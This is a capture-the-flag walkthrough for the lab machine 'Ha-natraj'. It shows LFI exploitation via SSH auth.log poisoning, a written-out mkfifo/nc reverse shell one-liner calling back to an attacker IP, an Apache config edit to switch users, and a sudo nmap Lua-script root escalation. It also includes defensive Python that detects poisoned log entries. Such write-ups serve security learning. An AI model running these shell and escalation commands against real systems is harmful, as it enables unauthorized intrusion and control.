PGP Walkthrough: Ha-natraj


This machine is CTF-like: we have to guess at a few things to find a way to a shell.

Scan

nmap gave only a little direction: the machine has only ports 22 and 80 open.

Port 80

From the dirsearch report, I got an interesting directory.

It allowed me to see the contents of the directory.

In it there was a PHP file that seemed blank.

It might be the exploit .

Shell as www

I tried the "file" parameter to find out what this PHP file does.

And found that it had an LFI vulnerability.

By the way, you can press Ctrl+U (view source) to make the response easier to read.

Like this.

I could also read the SSH log, /var/log/auth.log.

So I injected PHP code into auth.log by logging in over SSH with PHP code as the username.

The code was recorded in the log successfully.
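From the defender's side, this log-poisoning step leaves a clear trace: sshd writes the attempted username into auth.log verbatim. The following added example (not part of the original post; the log lines are constructed) scans auth.log for usernames that carry PHP tags or are otherwise malformed and groups the hits by source IP.

```python
import re

# Constructed sample of /var/log/auth.log lines (not taken from the original post).
SAMPLE_AUTH_LOG = """\
May 28 11:07:58 natraj sshd[1201]: Accepted password for mahakal from 10.0.0.5 port 40012 ssh2
May 28 11:08:00 natraj sshd[1210]: Invalid user <?php phpinfo(); ?> from 192.168.49.250 port 51234
May 28 11:08:02 natraj sshd[1210]: Failed password for invalid user <?php phpinfo(); ?> from 192.168.49.250 port 51234 ssh2
May 28 11:08:30 natraj sshd[1215]: Invalid user admin from 192.168.49.250 port 51240
"""

# sshd lines that echo an attacker-controlled username into the log.
SSHD_USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user) "
    r"(?P<user>.*?) from (?P<ip>\S+) port"
)
# A normal Linux account name: no spaces, no '<', '?', '(' and so on.
VALID_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]*\$?$", re.IGNORECASE)
# PHP open tags: <?php, <?= or the short <? form.
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.IGNORECASE)


def find_poisoned_logins(log_text):
    """Return one finding per sshd line whose username looks injected."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = SSHD_USER_RE.search(line)
        if not m:
            continue
        user, ip = m.group("user"), m.group("ip")
        if PHP_TAG_RE.search(user):
            findings.append({"line": lineno, "ip": ip, "reason": "php tag in username"})
        elif not VALID_USERNAME_RE.match(user):
            findings.append({"line": lineno, "ip": ip, "reason": "malformed username"})
    return findings


def count_by_ip(findings):
    """Aggregate findings per source address so one poisoning source stands out."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_poisoned_logins(SAMPLE_AUTH_LOG)
    for h in hits:
        print(f"line {h['line']}: {h['reason']} from {h['ip']}")
    print(count_by_ip(hits))
```

A plain "Invalid user admin" line is left alone; only names that cannot be real accounts are reported, which keeps the check quiet on ordinary brute-force noise.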

Now I could get a reverse shell.

But after trying many commands, I realized the payload had to be encoded.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.250 4444 >/tmp/f

Don't forget to have nc listening to catch the shell.

Shell as mahakal

The www user can restart the Apache server.

And linpeas showed that apache2.conf was writable.

So I edited apache2.conf to make Apache run as mahakal.

Then I could get a shell as mahakal. (Why not change it to root? Because if I set it to root, the server fails to start.)

Since it is difficult to edit a file from a reverse shell, I copied the file to my local machine, edited it there, downloaded it back to the server, and finally copied the new conf file over the old one.

You can do it as I did below.

1. Copy the file locally and change the username.

2. Use python2 to start a simple HTTP server.

3. Download the conf file with wget and cp it over the old file.

4. Finally, restart the server and catch the reverse shell again.

Privilege Escalation to Root

This user can run nmap with SUID.

However, its version was so old that I could not use the interactive mode as usual.

And GTFOBins (nmap) gave me another way to use nmap.

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

Thanks for reading, and have a nice day.

: )